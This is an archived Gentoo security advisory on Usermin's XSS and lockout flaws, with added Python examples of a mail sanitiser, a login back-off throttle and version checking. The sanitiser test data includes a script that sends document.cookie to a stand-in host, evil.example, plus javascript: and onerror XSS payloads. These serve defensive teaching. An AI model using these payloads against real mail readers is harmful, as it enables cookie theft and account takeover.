Gentoo Archives: gentoo-announce

From: Thierry Carrez <koon@g.o>
To: gentoo-announce@l.g.o
Cc: bugtraq@×××××××××××××.com, full-disclosure@××××××××××××.com, security-alerts@×××××××××××××.com
Subject: [gentoo-announce] [ GLSA 200406-15 ] Usermin: Multiple vulnerabilities
Date: Fri, 18 Jun 2004 18:32:31
Message-Id: 40D334FC.4090601@gentoo.org
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal
Title: Usermin: Multiple vulnerabilities
Date: June 18, 2004
Bugs: #54030
ID: 200406-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Usermin contains two security vulnerabilities which could lead to a
denial of service attack and to information disclosure.

Background
==========

Usermin is a web-based administration tool for Unix. It supports a wide
range of user-level tasks, including configuring mail forwarding,
setting up SSH and reading mail.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  app-admin/usermin            <= 1.070-r1                 >= 1.080

Description
===========

Usermin contains two security vulnerabilities. The first is a failure
to properly sanitize e-mail messages that contain malicious HTML or
script code before they are displayed to the user. The second could
allow an attacker to lock out a valid user simply by submitting an
invalid username and password combination for that user's account.

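The following is an added illustration of the defence the first
vulnerability calls for; it is not Usermin's code and is not part of
this advisory. A webmail front end must pass an untrusted HTML message
through an allow-list sanitizer before placing it in the reader's page,
so that script elements, event-handler attributes and javascript: links
never reach the browser. The hostile message body below is constructed
for the example, and the allow-lists are the example's own choice.

```python
# Allow-list HTML sanitiser for untrusted mail bodies (added example, not
# Usermin's code).  Only the tags and attributes named below survive; script
# elements are dropped together with their content, event-handler attributes
# are never copied, and links must use one of the listed URL schemes.
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
# Elements whose *content* must go too, not just the tag.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0      # > 0 while inside a dropped-content element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth += 1
            return
        if self._skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            # on* handlers (onload, onerror, ...) and anything not allow-listed
            # for this tag are discarded.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            if name == "href":
                target = (value or "").strip().lower()
                if not target.startswith(SAFE_URL_SCHEMES):
                    continue  # drops javascript:, data:, vbscript: and friends
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if self._skip_depth or tag not in ALLOWED_TAGS or tag == "br":
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped, so a "<" typed in a message never becomes markup.
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))


def sanitize_mail_html(body):
    """Return the HTML that is safe to embed in the reader's page."""
    parser = MailSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)


# Constructed hostile message body for the example.
CONSTRUCTED_MAIL = (
    '<p>Hi,</p>'
    '<script>document.location="http://evil.example/?"+document.cookie</script>'
    '<p onmouseover="alert(1)">see '
    '<a href="javascript:alert(document.cookie)">this</a> or '
    '<a href="https://example.org/x">that</a></p>'
    '<img src=x onerror="alert(2)">'
)

if __name__ == "__main__":
    print(sanitize_mail_html(CONSTRUCTED_MAIL))
```

A deny-list that only removes <script> is what leaves the onerror and
javascript: vectors open, which is why the example keeps nothing that is
not explicitly named. Run sanitize_mail_html() on the body at display
time, before it is embedded in any page served under the user's session.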
Impact
======

By sending a specially crafted e-mail, an attacker can execute arbitrary
script code in the context of the victim's browser when the victim reads
the message through Usermin. This can lead to cookie theft and
potentially to the compromise of user accounts. Furthermore, an attacker
could lock out legitimate users by sending invalid login information.

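The second vulnerability is a design problem rather than a coding slip:
a lockout keyed on the account name alone turns every failed login into
a denial of service against that account. The following added example
(not Usermin's code, and not drawn from the Usermin fix, which this
advisory does not describe) contrasts such a naive policy with a
throttle keyed on client address and username that applies an
exponential back-off instead of a hard lock. The user list, addresses
and timings are constructed for the example.

```python
# Two failed-login policies side by side (added example, not Usermin's code).
# NaiveLockout counts failures per account from any source, so an attacker
# who knows only a username can deny that user service.  BackoffThrottle
# keys on (client address, username) and slows the offender down with an
# exponential back-off instead of locking the account.
import time
from collections import defaultdict

# Constructed credential store for the example (never store plaintext
# passwords in real code; a hash comparison goes in place of the ==).
USERS = {"alice": "correct horse battery staple"}


class NaiveLockout:
    """Locks the account after MAX_FAILURES bad attempts from anywhere."""
    MAX_FAILURES = 3

    def __init__(self):
        self.failures = defaultdict(int)
        self.locked = set()

    def login(self, username, password, client_ip):
        if username in self.locked:
            return False                      # even the right password fails now
        if USERS.get(username) == password:
            self.failures[username] = 0
            return True
        self.failures[username] += 1
        if self.failures[username] >= self.MAX_FAILURES:
            self.locked.add(username)
        return False


class BackoffThrottle:
    """Per-(ip, user) exponential back-off; the account itself is never locked."""
    BASE_DELAY = 1.0                          # seconds after the first failure
    MAX_DELAY = 60.0

    def __init__(self, now=time.monotonic):
        self.now = now                        # injectable clock for testing
        self.state = {}                       # (ip, user) -> (failures, not_before)

    def login(self, username, password, client_ip):
        key = (client_ip, username)
        failures, not_before = self.state.get(key, (0, 0.0))
        if self.now() < not_before:
            return False                      # still backing off; do not even check
        if USERS.get(username) == password:
            self.state.pop(key, None)
            return True
        failures += 1
        delay = min(self.BASE_DELAY * 2 ** (failures - 1), self.MAX_DELAY)
        self.state[key] = (failures, self.now() + delay)
        return False


def demo():
    """Attacker floods wrong passwords for alice; alice then logs in from home."""
    attacker_ip, alice_ip = "203.0.113.9", "198.51.100.7"   # constructed
    naive = NaiveLockout()
    for _ in range(3):
        naive.login("alice", "wrong", attacker_ip)
    naive_alice = naive.login("alice", USERS["alice"], alice_ip)

    clock = [0.0]
    throttle = BackoffThrottle(now=lambda: clock[0])
    for i in range(3):
        clock[0] += 2.0 ** i         # each retry lands just after the previous back-off
        throttle.login("alice", "wrong", attacker_ip)
    throttled_alice = throttle.login("alice", USERS["alice"], alice_ip)
    attacker_again = throttle.login("alice", USERS["alice"], attacker_ip)
    remaining = throttle.state[(attacker_ip, "alice")][1] - clock[0]
    return {
        "naive_victim_locked_out": not naive_alice,
        "hardened_victim_logs_in": throttled_alice,
        "hardened_attacker_throttled": not attacker_again,
        "attacker_backoff_seconds": remaining,
    }


if __name__ == "__main__":
    print(demo())
```

The back-off is still per source, so an attacker behind the same NAT as
the victim can slow the victim's logins; a CAPTCHA after repeated
failures, a per-account limit that grows only slowly, and alerting on
bursts of failed logins are the usual complements.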
Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.

Resolution
==========

Usermin users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=app-admin/usermin-1.080"
    # emerge ">=app-admin/usermin-1.080"

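The bounds in the table and in the emerge atom above use Gentoo's
version syntax, in which 1.070-r1 (ebuild revision 1 of upstream 1.070)
sorts below 1.080. The following added example, which is not part of
this advisory and is not Portage's own code, implements the subset of
the Gentoo version-comparison rules that plain dotted versions with an
optional -rN revision need, and uses it to classify an installed version
against this GLSA's table. Letter suffixes and _pre/_rc/_p parts are out
of scope for it.

```python
# Classify an installed Gentoo package version against this GLSA's table
# (added example; not part of the advisory and not Portage's own code).
# Implements only the subset of the Gentoo version-comparison rules that
# plain dotted versions with an optional -rN ebuild revision need.
import re

VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:-r(\d+))?$")


def parse_version(version):
    """Split '1.070-r1' into (['1', '070'], 1); the revision defaults to 0."""
    m = VERSION_RE.match(version)
    if not m:
        raise ValueError(f"unsupported version syntax: {version!r}")
    return m.group(1).split("."), int(m.group(2) or 0)


def _cmp_component(a, b, first):
    # The first component, and later ones without a leading zero, compare as
    # integers; a later component with a leading zero compares as a string
    # with trailing zeros stripped, so 1.070 < 1.08 < 1.1 but 1.9 < 1.10.
    if first or (a[0] != "0" and b[0] != "0"):
        ia, ib = int(a), int(b)
        return (ia > ib) - (ia < ib)
    a, b = a.rstrip("0"), b.rstrip("0")
    return (a > b) - (a < b)


def compare_versions(x, y):
    """Return -1, 0 or 1 as x is older than, equal to, or newer than y."""
    xparts, xrev = parse_version(x)
    yparts, yrev = parse_version(y)
    for i in range(max(len(xparts), len(yparts))):
        if i >= len(xparts):
            return -1                     # 1.07 < 1.07.1
        if i >= len(yparts):
            return 1
        c = _cmp_component(xparts[i], yparts[i], first=(i == 0))
        if c:
            return c
    return (xrev > yrev) - (xrev < yrev)  # 1.070 < 1.070-r1


def satisfies(version, op, bound):
    c = compare_versions(version, bound)
    return {"<": c < 0, "<=": c <= 0, "=": c == 0, ">=": c >= 0, ">": c > 0}[op]


# Ranges copied from the Affected packages table of this GLSA.
VULNERABLE = ("<=", "1.070-r1")
UNAFFECTED = (">=", "1.080")


def glsa_status(installed):
    """'vulnerable', 'unaffected', or 'unknown' when the table covers neither."""
    if satisfies(installed, *VULNERABLE):
        return "vulnerable"
    if satisfies(installed, *UNAFFECTED):
        return "unaffected"
    return "unknown"                      # e.g. 1.075, which the advisory never names


if __name__ == "__main__":
    for v in ("1.070", "1.070-r1", "1.075", "1.080", "1.10"):
        print(v, glsa_status(v))
```

The "unknown" result matters: a version that falls between the two
bounds is neither declared safe nor declared vulnerable by the advisory,
and treating it as safe would be a guess.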
References
==========

  [ 1 ] Bugtraq Announcement
        http://www.securityfocus.com/bid/10521
  [ 2 ] SNS Advisory
        http://www.lac.co.jp/security/csl/intelligence/SNSadvisory_e/75_e.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200406-15.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@g.o or, alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFA0zT8vcL1obalX08RAs/oAJ9pWiaefGSPPaQw7zwpw0p4qy2vAQCbBr/T
JGv0HPGPWzZ/UxP2A0WhrFE=
=K3MM
-----END PGP SIGNATURE-----